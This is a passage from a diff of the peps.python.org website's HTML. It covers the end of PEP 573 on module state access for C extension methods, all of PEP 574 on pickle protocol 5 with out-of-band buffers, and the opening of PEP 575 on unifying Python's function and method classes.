While this PEP takes an additional step towards fully solving the problems that +PEP 3121 and PEP 489 started tackling, it does not attempt to resolve all +remaining concerns. In particular, access to the module state +from slot methods (nb_add, etc) is not solved.

+
+
+

Terminology

+
+

Process-Global State

+

C-level static variables. Since this is very low-level +memory storage, it must be managed carefully.

+
+
+

Per-module State

+

State local to a module object, allocated dynamically as part of a +module object’s initialization. This isolates the state from other +instances of the module (including those in other subinterpreters).

+

Accessed by PyModule_GetState().

+
+
+

Static Type

+

A type object defined as a C-level static variable, i.e. a compiled-in type +object.

+

A static type needs to be shared between module instances and has no +information of what module it belongs to. +Static types do not have __dict__ (although their instances might).

+
+
+

Heap Type

+

A type object created at run time.

+
+
+

Defining Class

+

The defining class of a method (either bound or unbound) is the class on which +the method was defined. +A class that merely inherits the method from its base is not the defining class.

+

For example, int is the defining class of True.to_bytes, +True.__floor__ and int.__repr__.

+

In C, the defining class is the one defined with the corresponding +tp_methods or “tp slots” [1] entry. +For methods defined in Python, the defining class is saved in the +__class__ closure cell.

+
+
+

C-API

+

The “Python/C API” as described in Python documentation. +CPython implements the C-API, but other implementations exist.

+
+
+
+

Rationale

+

PEP 489 introduced a new way to initialize extension modules, which brings +several advantages to extensions that implement it:

+
    +
  • The extension modules behave more like their Python counterparts.
  • +
  • The extension modules can easily support loading into pre-existing +module objects, which paves the way for extension module support for +runpy or for systems that enable extension module reloading.
  • +
  • Loading multiple modules from the same extension is possible, which +makes it possible to test module isolation (a key feature for proper +sub-interpreter support) from a single interpreter.
  • +
+

The biggest hurdle for adoption of PEP 489 is allowing access to module state +from methods of extension types. +Currently, the way to access this state from extension methods is by looking up +the module via PyState_FindModule (in contrast to module level functions in +extension modules, which receive a module reference as an argument). +However, PyState_FindModule queries the thread-local state, making it +relatively costly compared to C level process global access and consequently +deterring module authors from using it.

+

Also, PyState_FindModule relies on the assumption that in each +subinterpreter, there is at most one module corresponding to +a given PyModuleDef. This assumption does not hold for modules that use +PEP 489’s multi-phase initialization, so PyState_FindModule is unavailable +for these modules.

+

A faster, safer way of accessing module-level state from extension methods +is needed.

+
+
+

Background

+

The implementation of a Python method may need access to one or more of +the following pieces of information:

+
    +
  • The instance it is called on (self)
  • +
  • The underlying function
  • +
  • The defining class, i. e. the class the method was defined in
  • +
  • The corresponding module
  • +
  • The module state
  • +
+

In Python code, the Python-level equivalents may be retrieved as:

+
import sys
+
+class Foo:
+    def meth(self):
+        instance = self
+        module_globals = globals()
+        module_object = sys.modules[__name__]  # (1)
+        underlying_function = Foo.meth         # (1)
+        defining_class = Foo                   # (1)
+        defining_class = __class__             # (2)
+
+
+
+

Note

+

The defining class is not type(self), since type(self) might +be a subclass of Foo.

+
+

The statements marked (1) implicitly rely on name-based lookup via the +function’s __globals__: either the Foo attribute to access the defining +class and Python function object, or __name__ to find the module object in +sys.modules.

+

In Python code, this is feasible, as __globals__ is set appropriately when +the function definition is executed, and even if the namespace has been +manipulated to return a different object, at worst an exception will be raised.

+

The __class__ closure, (2), is a safer way to get the defining class, but it +still relies on __closure__ being set appropriately.

+

By contrast, extension methods are typically implemented as normal C functions. +This means that they only have access to their arguments and C level thread-local +and process-global states. Traditionally, many extension modules have stored +their shared state in C-level process globals, causing problems when:

+
    +
  • running multiple initialize/finalize cycles in the same process
  • +
  • reloading modules (e.g. to test conditional imports)
  • +
  • loading extension modules in subinterpreters
  • +
+

PEP 3121 attempted to resolve this by offering the PyState_FindModule API, +but this still has significant problems when it comes to extension methods +(rather than module level functions):

+
    +
  • it is markedly slower than directly accessing C-level process-global state
  • +
  • there is still some inherent reliance on process global state that means it +still doesn’t reliably handle module reloading
  • +
+

It’s also the case that when looking up a C-level struct such as module state, +supplying an unexpected object layout can crash the interpreter, so it’s +significantly more important to ensure that extension methods receive the kind +of object they expect.

+
+
+

Proposal

+

Currently, a bound extension method (PyCFunction or +PyCFunctionWithKeywords) receives only self, and (if applicable) the +supplied positional and keyword arguments.

+

While module-level extension functions already receive access to the defining +module object via their self argument, methods of extension types don’t have +that luxury: they receive the bound instance via self, and hence have no +direct access to the defining class or the module level state.

+

The additional module level context described above can be made available with +two changes. +Both additions are optional; extension authors need to opt in to start +using them:

+
    +
  • Add a pointer to the module to heap type objects.
  • +
  • Pass the defining class to the underlying C function.

    In CPython, the defining class is readily available at the time the built-in +method object (PyCFunctionObject) is created, so it can be stored +in a new struct that extends PyCFunctionObject.

    +
  • +
+

The module state can then be retrieved from the module object via +PyModule_GetState.

+

Note that this proposal implies that any type whose methods need to access +per-module state must be a heap type, rather than a static type. This is +necessary to support loading multiple module objects from a single +extension: a static type, as a C-level global, has no information about +which module object it belongs to.

+
+

Slot methods

+

The above changes don’t cover slot methods, such as tp_iter or nb_add.

+

The problem with slot methods is that their C API is fixed, so we can’t +simply add a new argument to pass in the defining class. +Two possible solutions have been proposed to this problem:

+
    +
  • Look up the class through walking the MRO. +This is potentially expensive, but will be usable if performance is not +a problem (such as when raising a module-level exception).
  • +
  • Storing a pointer to the defining class of each slot in a separate table, +__typeslots__ [2]. This is technically feasible and fast, +but quite invasive.
  • +
+

Modules affected by this concern also have the option of using +thread-local state or PEP 567 context variables as a caching mechanism, or +else defining their own reload-friendly lookup caching scheme.

+

Solving the issue generally is deferred to a future PEP.

+
+
+
+

Specification

+
+

Adding module references to heap types

+

A new factory method will be added to the C-API for creating modules:

+
PyObject* PyType_FromModuleAndSpec(PyObject *module,
+                                   PyType_Spec *spec,
+                                   PyObject *bases)
+
+
+

This acts the same as PyType_FromSpecWithBases, and additionally associates +the provided module object with the new type. (In CPython, this will set +ht_module described below.)

+

Additionally, an accessor, PyObject * PyType_GetModule(PyTypeObject *) +will be provided. +It will return the type’s associated module if one is set, +otherwise it will set TypeError and return NULL. +When given a static type, it will always set TypeError and return NULL.

+

To implement this in CPython, the PyHeapTypeObject struct will get a +new member, PyObject *ht_module, that will store a pointer to the +associated module. +It will be NULL by default and should not be modified after the type +object is created.

+

The ht_module member will not be inherited by subclasses; it needs to be +set using PyType_FromSpecWithBases for each individual type that needs it.

+

Usually, creating a class with ht_module set will create a reference +cycle involving the class and the module. +This is not a problem, as tearing down modules is not a performance-sensitive +operation, and module-level functions typically also create reference cycles. +The existing “set all module globals to None” code that breaks function cycles +through f_globals will also break the new cycles through ht_module.

+
+
+

Passing the defining class to extension methods

+

A new signature flag, METH_METHOD, will be added for use in +PyMethodDef.ml_flags. Conceptually, it adds defining_class +to the function signature. +To make the initial implementation easier, the flag can only be used as +(METH_FASTCALL | METH_KEYWORDS | METH_METHOD). +(It can’t be used with other flags like METH_O or bare METH_FASTCALL, +though it may be combined with METH_CLASS or METH_STATIC).

+

C functions for methods defined using this flag combination will be called +using a new C signature called PyCMethod:

+
PyObject *PyCMethod(PyObject *self,
+                    PyTypeObject *defining_class,
+                    PyObject *const *args,
+                    size_t nargsf,
+                    PyObject *kwnames)
+
+
+

Additional combinations like (METH_VARARGS | METH_METHOD) may be added +in the future (or even in the initial implementation of this PEP). +However, METH_METHOD should always be an additional flag, i.e., the +defining class should only be passed in if needed.

+

In CPython, a new structure extending PyCFunctionObject will be added +to hold the extra information:

+
typedef struct {
+    PyCFunctionObject func;
+    PyTypeObject *mm_class; /* Passed as 'defining_class' arg to the C func */
+} PyCMethodObject;
+
+
+

The PyCFunction implementation will pass mm_class into a +PyCMethod C function when it finds the METH_METHOD flag being set. +A new macro PyCFunction_GET_CLASS(cls) will be added for easier access +to mm_class.

+

C methods may continue to use the other METH_* signatures if they do +not require access to their defining class/module. +If METH_METHOD is not set, casting to PyCMethodObject is invalid.

+
+
+

Argument Clinic

+

To support passing the defining class to methods using Argument Clinic, +a new converter called defining_class will be added to CPython’s Argument +Clinic tool.

+

Each method may only have one argument using this converter, and it must +appear after self, or, if self is not used, as the first argument. +The argument will be of type PyTypeObject *.

+

When used, Argument Clinic will select +METH_FASTCALL | METH_KEYWORDS | METH_METHOD as the calling convention. +The argument will not appear in __text_signature__.

+

The new converter will initially not be compatible with __init__ and +__new__ methods, which cannot use the METH_METHOD convention.

+
+
+

Helpers

+

Getting to per-module state from a heap type is a very common task. To make +this easier, a helper will be added:

+
void *PyType_GetModuleState(PyObject *type)
+
+
+

This function takes a heap type and on success, it returns pointer to the state +of the module that the heap type belongs to.

+

On failure, two scenarios may occur. When a non-type object, or a type without a +module is passed in, TypeError is set and NULL returned. If the module +is found, the pointer to the state, which may be NULL, is returned without +setting any exception.

+
+
+

Modules Converted in the Initial Implementation

+

To validate the approach, the _elementtree module will be modified during +the initial implementation.

+
+
+
+

Summary of API Changes and Additions

+

The following will be added to Python C-API:

+
+
    +
  • PyType_FromModuleAndSpec function
  • +
  • PyType_GetModule function
  • +
  • PyType_GetModuleState function
  • +
  • METH_METHOD call flag
  • +
  • PyCMethod function signature
  • +
+
+

The following additions will be added as CPython implementation details, +and won’t be documented:

+
+
    +
  • PyCFunction_GET_CLASS macro
  • +
  • PyCMethodObject struct
  • +
  • ht_module member of _heaptypeobject
  • +
  • defining_class converter in Argument Clinic
  • +
+
+
+
+

Backwards Compatibility

+

One new pointer is added to all heap types. +All other changes are adding new functions and structures, +or changes to private implementation details.

+
+
+

Implementation

+

An initial implementation is available in a Github repository [3]; +a patchset is at [4].

+
+
+

Possible Future Extensions

+
+

Slot methods

+

A way of passing defining class (or module state) to slot methods may be +added in the future.

+

A previous version of this PEP proposed a helper function that would determine +a defining class by searching the MRO for a class that defines a slot to a +particular function. However, this approach would fail if a class is mutated +(which is, for heap types, possible from Python code). +Solving this problem is left to future discussions.

+
+
+

Easy creation of types with module references

+

It would be possible to add a PEP 489 execution slot type to make +creating heap types significantly easier than calling +PyType_FromModuleAndSpec. +This is left to a future PEP.

+

It may be good to add a good way to create static exception types from the +limited API. Such exception types could be shared between subinterpreters, +but instantiated without needing specific module state. +This is also left to possible future discussions.

+
+
+

Optimization

+

As proposed here, methods defined with the METH_METHOD flag only support +one specific signature.

+

If it turns out that other signatures are needed for performance reasons, +they may be added.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0573.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0574/index.html b/pep-0574/index.html new file mode 100644 index 00000000000..b10487b53e5 --- /dev/null +++ b/pep-0574/index.html @@ -0,0 +1,696 @@ + + + + + + + + PEP 574 – Pickle protocol 5 with out-of-band data | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 574 – Pickle protocol 5 with out-of-band data

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
23-Mar-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Mar-2018, 30-Apr-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to standardize a new pickle protocol version, and +accompanying APIs to take full advantage of it:

+
    +
  1. A new pickle protocol version (5) to cover the extra metadata needed +for out-of-band data buffers.
  2. +
  3. A new PickleBuffer type for __reduce_ex__ implementations +to return out-of-band data buffers.
  4. +
  5. A new buffer_callback parameter when pickling, to handle out-of-band +data buffers.
  6. +
  7. A new buffers parameter when unpickling to provide out-of-band data +buffers.
  8. +
+

The PEP guarantees unchanged behaviour for anyone not using the new APIs.

+
+
+

Rationale

+

The pickle protocol was originally designed in 1995 for on-disk persistency +of arbitrary Python objects. The performance of a 1995-era storage medium +probably made it irrelevant to focus on performance metrics such as +use of RAM bandwidth when copying temporary data before writing it to disk.

+

Nowadays the pickle protocol sees a growing use in applications where most +of the data isn’t ever persisted to disk (or, when it is, it uses a portable +format instead of Python-specific). Instead, pickle is being used to transmit +data and commands from one process to another, either on the same machine +or on multiple machines. Those applications will sometimes deal with very +large data (such as Numpy arrays or Pandas dataframes) that need to be +transferred around. For those applications, pickle is currently +wasteful as it imposes spurious memory copies of the data being serialized.

+

As a matter of fact, the standard multiprocessing module uses pickle +for serialization, and therefore also suffers from this problem when +sending large data to another process.

+

Third-party Python libraries, such as Dask [1], PyArrow [4] +and IPyParallel [3], have started implementing alternative +serialization schemes with the explicit goal of avoiding copies on large +data. Implementing a new serialization scheme is difficult and often +leads to reduced generality (since many Python objects support pickle +but not the new serialization scheme). Falling back on pickle for +unsupported types is an option, but then you get back the spurious +memory copies you wanted to avoid in the first place. For example, +dask is able to avoid memory copies for Numpy arrays and +built-in containers thereof (such as lists or dicts containing Numpy +arrays), but if a large Numpy array is an attribute of a user-defined +object, dask will serialize the user-defined object as a pickle +stream, leading to memory copies.

+

The common theme of these third-party serialization efforts is to generate +a stream of object metadata (which contains pickle-like information about +the objects being serialized) and a separate stream of zero-copy buffer +objects for the payloads of large objects. Note that, in this scheme, +small objects such as ints, etc. can be dumped together with the metadata +stream. Refinements can include opportunistic compression of large data +depending on its type and layout, like dask does.

+

This PEP aims to make pickle usable in a way where large data is handled +as a separate stream of zero-copy buffers, letting the application handle +those buffers optimally.

+
+
+

Example

+

To keep the example simple and avoid requiring knowledge of third-party +libraries, we will focus here on a bytearray object (but the issue is +conceptually the same with more sophisticated objects such as Numpy arrays). +Like most objects, the bytearray object isn’t immediately understood by +the pickle module and must therefore specify its decomposition scheme.

+

Here is how a bytearray object currently decomposes for pickling:

+
>>> b.__reduce_ex__(4)
+(<class 'bytearray'>, (b'abc',), None)
+
+
+

This is because the bytearray.__reduce_ex__ implementation reads +morally as follows:

+
class bytearray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol == 4:
+         return type(self), bytes(self), None
+      # Legacy code for earlier protocols omitted
+
+
+

In turn it produces the following pickle code:

+
>>> pickletools.dis(pickletools.optimize(pickle.dumps(b, protocol=4)))
+    0: \x80 PROTO      4
+    2: \x95 FRAME      30
+   11: \x8c SHORT_BINUNICODE 'builtins'
+   21: \x8c SHORT_BINUNICODE 'bytearray'
+   32: \x93 STACK_GLOBAL
+   33: C    SHORT_BINBYTES b'abc'
+   38: \x85 TUPLE1
+   39: R    REDUCE
+   40: .    STOP
+
+
+

(the call to pickletools.optimize above is only meant to make the +pickle stream more readable by removing the MEMOIZE opcodes)

+

We can notice several things about the bytearray’s payload (the sequence +of bytes b'abc'):

+
    +
  • bytearray.__reduce_ex__ produces a first copy by instantiating a +new bytes object from the bytearray’s data.
  • +
  • pickle.dumps produces a second copy when inserting the contents of +that bytes object into the pickle stream, after the SHORT_BINBYTES opcode.
  • +
  • Furthermore, when deserializing the pickle stream, a temporary bytes +object is created when the SHORT_BINBYTES opcode is encountered (inducing +a data copy).
  • +
+

What we really want is something like the following:

+
    +
  • bytearray.__reduce_ex__ produces a view of the bytearray’s data.
  • +
  • pickle.dumps doesn’t try to copy that data into the pickle stream +but instead passes the buffer view to its caller (which can decide on the +most efficient handling of that buffer).
  • +
  • When deserializing, pickle.loads takes the pickle stream and the +buffer view separately, and passes the buffer view directly to the +bytearray constructor.
  • +
+

We see that several conditions are required for the above to work:

+
    +
  • __reduce__ or __reduce_ex__ must be able to return something +that indicates a serializable no-copy buffer view.
  • +
  • The pickle protocol must be able to represent references to such buffer +views, instructing the unpickler that it may have to get the actual buffer +out of band.
  • +
  • The pickle.Pickler API must provide its caller with a way +to receive such buffer views while serializing.
  • +
  • The pickle.Unpickler API must similarly allow its caller to provide +the buffer views required for deserialization.
  • +
  • For compatibility, the pickle protocol must also be able to contain direct +serializations of such buffer views, such that current uses of the pickle +API don’t have to be modified if they are not concerned with memory copies.
  • +
+
+
+

Producer API

+

We are introducing a new type pickle.PickleBuffer which can be +instantiated from any buffer-supporting object, and is specifically meant +to be returned from __reduce__ implementations:

+
class bytearray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol >= 5:
+         return type(self), (PickleBuffer(self),), None
+      # Legacy code for earlier protocols omitted
+
+
+

PickleBuffer is a simple wrapper that doesn’t have all the memoryview +semantics and functionality, but is specifically recognized by the pickle +module if protocol 5 or higher is enabled. It is an error to try to +serialize a PickleBuffer with pickle protocol version 4 or earlier.

+

Only the raw data of the PickleBuffer will be considered by the +pickle module. Any type-specific metadata (such as shapes or +datatype) must be returned separately by the type’s __reduce__ +implementation, as is already the case.

+
+

PickleBuffer objects

+

The PickleBuffer class supports a very simple Python API. Its constructor +takes a single PEP 3118-compatible object. PickleBuffer +objects themselves support the buffer protocol, so consumers can +call memoryview(...) on them to get additional information +about the underlying buffer (such as the original type, shape, etc.). +In addition, PickleBuffer objects have the following methods:

+

raw()

+
+
Return a memoryview of the raw memory bytes underlying the PickleBuffer, +erasing any shape, strides and format information. This is required to +handle Fortran-contiguous buffers correctly in the pure Python pickle +implementation.
+

release()

+
+
Release the PickleBuffer’s underlying buffer, making it unusable.
+

On the C side, a simple API will be provided to create and inspect +PickleBuffer objects:

+

PyObject *PyPickleBuffer_FromObject(PyObject *obj)

+
+
Create a PickleBuffer object holding a view over the PEP 3118-compatible +obj.
+

PyPickleBuffer_Check(PyObject *obj)

+
+
Return whether obj is a PickleBuffer instance.
+

const Py_buffer *PyPickleBuffer_GetBuffer(PyObject *picklebuf)

+
+
Return a pointer to the internal Py_buffer owned by the PickleBuffer +instance. An exception is raised if the buffer is released.
+

int PyPickleBuffer_Release(PyObject *picklebuf)

+
+
Release the PickleBuffer instance’s underlying buffer.
+
+
+

Buffer requirements

+

PickleBuffer can wrap any kind of buffer, including non-contiguous +buffers. However, it is required that __reduce__ only returns a +contiguous PickleBuffer (contiguity here is meant in the PEP 3118 +sense: either C-ordered or Fortran-ordered). Non-contiguous buffers +will raise an error when pickled.

+

This restriction is primarily an ease-of-implementation issue for the +pickle module but also other consumers of out-of-band buffers. +The simplest solution on the provider side is to return a contiguous +copy of a non-contiguous buffer; a sophisticated provider, though, may +decide instead to return a sequence of contiguous sub-buffers.

+
+
+
+

Consumer API

+

pickle.Pickler.__init__ and pickle.dumps are augmented with an additional +buffer_callback parameter:

+
class Pickler:
+   def __init__(self, file, protocol=None, ..., buffer_callback=None):
+      """
+      If *buffer_callback* is None (the default), buffer views are
+      serialized into *file* as part of the pickle stream.
+
+      If *buffer_callback* is not None, then it can be called any number
+      of times with a buffer view.  If the callback returns a false value
+      (such as None), the given buffer is out-of-band; otherwise the
+      buffer is serialized in-band, i.e. inside the pickle stream.
+
+      The callback should arrange to store or transmit out-of-band buffers
+      without changing their order.
+
+      It is an error if *buffer_callback* is not None and *protocol* is
+      None or smaller than 5.
+      """
+
+def pickle.dumps(obj, protocol=None, *, ..., buffer_callback=None):
+   """
+   See above for *buffer_callback*.
+   """
+
+
+

pickle.Unpickler.__init__ and pickle.loads are augmented with an +additional buffers parameter:

+
class Unpickler:
+   def __init__(file, *, ..., buffers=None):
+      """
+      If *buffers* is not None, it should be an iterable of buffer-enabled
+      objects that is consumed each time the pickle stream references
+      an out-of-band buffer view.  Such buffers have been given in order
+      to the *buffer_callback* of a Pickler object.
+
+      If *buffers* is None (the default), then the buffers are taken
+      from the pickle stream, assuming they are serialized there.
+      It is an error for *buffers* to be None if the pickle stream
+      was produced with a non-None *buffer_callback*.
+      """
+
+def pickle.loads(data, *, ..., buffers=None):
+   """
+   See above for *buffers*.
+   """
+
+
+
+
+

Protocol changes

+

Three new opcodes are introduced:

+
    +
  • BYTEARRAY8 creates a bytearray from the data following it in the pickle +stream and pushes it on the stack (just like BINBYTES8 does for bytes +objects);
  • +
  • NEXT_BUFFER fetches a buffer from the buffers iterable and pushes +it on the stack.
  • +
  • READONLY_BUFFER makes a readonly view of the top of the stack.
  • +
+

When pickling encounters a PickleBuffer, that buffer can be considered +in-band or out-of-band depending on the following conditions:

+
    +
  • if no buffer_callback is given, the buffer is in-band;
  • +
  • if a buffer_callback is given, it is called with the buffer. If the +callback returns a true value, the buffer is in-band; if the callback +returns a false value, the buffer is out-of-band.
  • +
+

An in-band buffer is serialized as follows:

+
    +
  • If the buffer is writable, it is serialized into the pickle stream as if +it were a bytearray object.
  • +
  • If the buffer is readonly, it is serialized into the pickle stream as if +it were a bytes object.
  • +
+

An out-of-band buffer is serialized as follows:

+
    +
  • If the buffer is writable, a NEXT_BUFFER opcode is appended to the +pickle stream.
  • +
  • If the buffer is readonly, a NEXT_BUFFER opcode is appended to the +pickle stream, followed by a READONLY_BUFFER opcode.
  • +
+

The distinction between readonly and writable buffers is motivated below +(see “Mutability”).

+
+
+

Side effects

+
+

Improved in-band performance

+

Even in-band pickling can be improved by returning a PickleBuffer +instance from __reduce_ex__, as one copy is avoided on the serialization +path [10] [12].

+
+
+
+

Caveats

+
+

Mutability

+

PEP 3118 buffers can be readonly or writable. Some objects, +such as Numpy arrays, need to be backed by a mutable buffer for full +operation. Pickle consumers that use the buffer_callback and buffers +arguments will have to be careful to recreate mutable buffers. When doing +I/O, this implies using buffer-passing API variants such as readinto +(which are also often preferable for performance).

+
+
+

Data sharing

+

If you pickle and then unpickle an object in the same process, passing +out-of-band buffer views, then the unpickled object may be backed by the +same buffer as the original pickled object.

+

For example, it might be reasonable to implement reduction of a Numpy array +as follows (crucial metadata such as shapes is omitted for simplicity):

+
class ndarray:
+
+   def __reduce_ex__(self, protocol):
+      if protocol == 5:
+         return numpy.frombuffer, (PickleBuffer(self), self.dtype)
+      # Legacy code for earlier protocols omitted
+
+
+

Then simply passing the PickleBuffer around from dumps to loads +will produce a new Numpy array sharing the same underlying memory as the +original Numpy object (and, incidentally, keeping it alive):

+
>>> import numpy as np
+>>> a = np.zeros(10)
+>>> a[0]
+0.0
+>>> buffers = []
+>>> data = pickle.dumps(a, protocol=5, buffer_callback=buffers.append)
+>>> b = pickle.loads(data, buffers=buffers)
+>>> b[0] = 42
+>>> a[0]
+42.0
+
+
+

This won’t happen with the traditional pickle API (i.e. without passing +buffers and buffer_callback parameters), because then the buffer view +is serialized inside the pickle stream with a copy.

+
+
+
+

Rejected alternatives

+
+

Using the existing persistent load interface

+

The pickle persistence interface is a way of storing references to +designated objects in the pickle stream while handling their actual +serialization out of band. For example, one might consider the following +for zero-copy serialization of bytearrays:

+
class MyPickle(pickle.Pickler):
+
+    def __init__(self, *args, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.buffers = []
+
+    def persistent_id(self, obj):
+        if type(obj) is not bytearray:
+            return None
+        else:
+            index = len(self.buffers)
+            self.buffers.append(obj)
+            return ('bytearray', index)
+
+
+class MyUnpickle(pickle.Unpickler):
+
+    def __init__(self, *args, buffers, **kwargs):
+        super().__init__(*args, **kwargs)
+        self.buffers = buffers
+
+    def persistent_load(self, pid):
+        type_tag, index = pid
+        if type_tag == 'bytearray':
+            return self.buffers[index]
+        else:
+            assert 0  # unexpected type
+
+
+

This mechanism has two drawbacks:

+
    +
  • Each pickle consumer must reimplement Pickler and Unpickler +subclasses, with custom code for each type of interest. Essentially, +N pickle consumers end up each implementing custom code for M producers. +This is difficult (especially for sophisticated types such as Numpy +arrays) and poorly scalable.
  • +
  • Each object encountered by the pickle module (even simple built-in objects +such as ints and strings) triggers a call to the user’s persistent_id() +method, leading to a possible performance drop compared to nominal.

    (the Python 2 cPickle module supported an undocumented +inst_persistent_id() hook that was only called on non-built-in types; +it was added in 1997 in order to alleviate the performance issue of +calling persistent_id, presumably at ZODB’s request)

    +
  • +
+
+
+

Passing a sequence of buffers in buffer_callback

+

By passing a sequence of buffers, rather than a single buffer, we would +potentially save on function call overhead in case a large number +of buffers are produced during serialization. This would need +additional support in the Pickler to save buffers before calling the +callback. However, it would also prevent the buffer callback from returning +a boolean to indicate whether a buffer is to be serialized in-band or +out-of-band.

+

We consider that having a large number of buffers to serialize is an +unlikely case, and decided to pass a single buffer to the buffer callback.

+
+
+

Allow serializing a PickleBuffer in protocol 4 and earlier

+

If we were to allow serializing a PickleBuffer in protocols 4 and earlier, +it would actually make a supplementary memory copy when the buffer is mutable. +Indeed, a mutable PickleBuffer would serialize as a bytearray object +in those protocols (that is a first copy), and serializing the bytearray +object would call bytearray.__reduce_ex__ which returns a bytes object +(that is a second copy).

+

To prevent __reduce__ implementors from introducing involuntary +performance regressions, we decided to reject PickleBuffer when +the protocol is smaller than 5. This forces implementors to switch to +__reduce_ex__ and implement protocol-dependent serialization, taking +advantage of the best path for each protocol (or at least treat protocol +5 and upwards separately from protocols 4 and downwards).

+
+
+
+

Implementation

+

The PEP was initially implemented in the author’s GitHub fork [6]. +It was later merged into Python 3.8 [7].

+

A backport for Python 3.6 and 3.7 is downloadable from PyPI +[8].

+

Support for pickle protocol 5 and out-of-band buffers was added to Numpy +[11].

+

Support for pickle protocol 5 and out-of-band buffers was added to the Apache +Arrow Python bindings [9].

+
+ +
+

Acknowledgements

+

Thanks to the following people for early feedback: Alyssa Coghlan, Olivier +Grisel, Stefan Krah, MinRK, Matt Rocklin, Eric Snow.

+

Thanks to Pierre Glaser and Olivier Grisel for experimenting with the +implementation.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0574.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0575/index.html b/pep-0575/index.html new file mode 100644 index 00000000000..988dd9c3372 --- /dev/null +++ b/pep-0575/index.html @@ -0,0 +1,1213 @@ + + + + + + + + PEP 575 – Unifying function/method classes | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 575 – Unifying function/method classes

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
27-Mar-2018
+
Python-Version:
+
3.8
+
Post-History:
+
31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018
+
+
+
+
Table of Contents +
+
+

Withdrawal notice

+

See PEP 580 for a better solution to allowing fast calling of custom classes.

+

See PEP 579 for a broader discussion of some of the other issues from this PEP.

+
+
+

Abstract

+

Reorganize the class hierarchy for functions and methods +with the goal of reducing the difference between +built-in functions (implemented in C) and Python functions. +Mainly, make built-in functions behave more like Python functions +without sacrificing performance.

+

A new base class base_function is introduced and the various function +classes, as well as method (renamed to bound_method), inherit from it.

+

We also allow subclassing the Python function class.

+
+
+

Motivation

+

Currently, CPython has two different function classes: +the first is Python functions, which is what you get +when defining a function with def or lambda. +The second is built-in functions such as len, isinstance or numpy.dot. +These are implemented in C.

+

These two classes are implemented completely independently and have different functionality. +In particular, it is currently not possible to implement a function efficiently in C +(only built-in functions can do that) +while still allowing introspection like inspect.signature or inspect.getsourcefile +(only Python functions can do that). +This is a problem for projects like Cython [1] that want to do exactly that.

+

In Cython, this was worked around by inventing a new function class called cyfunction. +Unfortunately, a new function class creates problems: +the inspect module does not recognize such functions as being functions [2] +and the performance is worse +(CPython has specific optimizations for calling built-in functions).

+

A second motivation is more generally making built-in functions and methods +behave more like Python functions and methods. +For example, Python unbound methods are just functions but +unbound methods of extension types (e.g. dict.get) are a distinct class. +Bound methods of Python classes have a __func__ attribute, +bound methods of extension types do not.

+

Third, this PEP allows great customization of functions. +The function class becomes subclassable and custom function +subclasses are also allowed for functions implemented in C. +In the latter case, this can be done with the same performance +as true built-in functions. +All functions can access the function object +(the self in __call__), paving the way for PEP 573.

+
+
+

New classes

+

This is the new class hierarchy for functions and methods:

+
              object
+                 |
+                 |
+          base_function
+         /       |     \
+        /        |      \
+       /         |   defined_function
+      /          |        \
+cfunction (*)    |         \
+                 |       function
+                 |
+           bound_method (*)
+
+
+

The two classes marked with (*) do not allow subclassing; +the others do.

+

There is no difference between functions and unbound methods, +while bound methods are instances of bound_method.

+
+

base_function

+

The class base_function becomes a new base class for all function types. +It is based on the existing builtin_function_or_method class, +but with the following differences and new features:

+
    +
  1. It acts as a descriptor implementing __get__ to turn a function into a method +if m_self is NULL. +If m_self is not NULL, +then this is a no-op: the existing function is returned instead.
  2. +
  3. A new read-only attribute __parent__, represented in the C structure as m_parent. +If this attribute exists, it represents the defining object. +For methods of extension types, this is the defining class (__class__ in plain Python) +and for functions of a module, this is the defining module. +In general, it can be any Python object. +If __parent__ is a class, it carries special semantics: +in that case, the function must be called with self being an instance of that class. +Finally, __qualname__ and __reduce__ will use __parent__ +as namespace (instead of __self__ before).
  4. +
  5. A new attribute __objclass__ which equals __parent__ if __parent__ +is a class. Otherwise, accessing __objclass__ raises AttributeError. +This is meant to be backwards compatible with method_descriptor.
  6. +
  7. The field ml_doc and the attributes __doc__ and +__text_signature__ (see Argument Clinic) +are not supported.
  8. +
  9. A new flag METH_PASS_FUNCTION for ml_flags. +If this flag is set, the C function stored in ml_meth is called with +an additional first argument equal to the function object.
  10. +
  11. A new flag METH_BINDING for ml_flags which only applies to +functions of a module (not methods of a class). +If this flag is set, then m_self is set to NULL instead +of the module. +This allows the function to behave more like a Python function +as it enables __get__.
  12. +
  13. A new flag METH_CALL_UNBOUND to disable self slicing.
  14. +
  15. A new flag METH_PYTHON for ml_flags. +This flag indicates that this function should be treated as Python function. +Ideally, use of this flag should be avoided because it goes +against the duck typing philosophy. +It is still needed in a few places though, for example profiling.
  16. +
+

The goal of base_function is that it supports all different ways +of calling functions and methods in just one structure. +For example, the new flag METH_PASS_FUNCTION +will be used by the implementation of methods.

+

It is not possible to directly create instances of base_function +(tp_new is NULL). +However, it is legal for C code to manually create instances.

+

These are the relevant C structures:

+
PyTypeObject PyBaseFunction_Type;
+
+typedef struct {
+    PyObject_HEAD
+    PyCFunctionDef *m_ml;     /* Description of the C function to call */
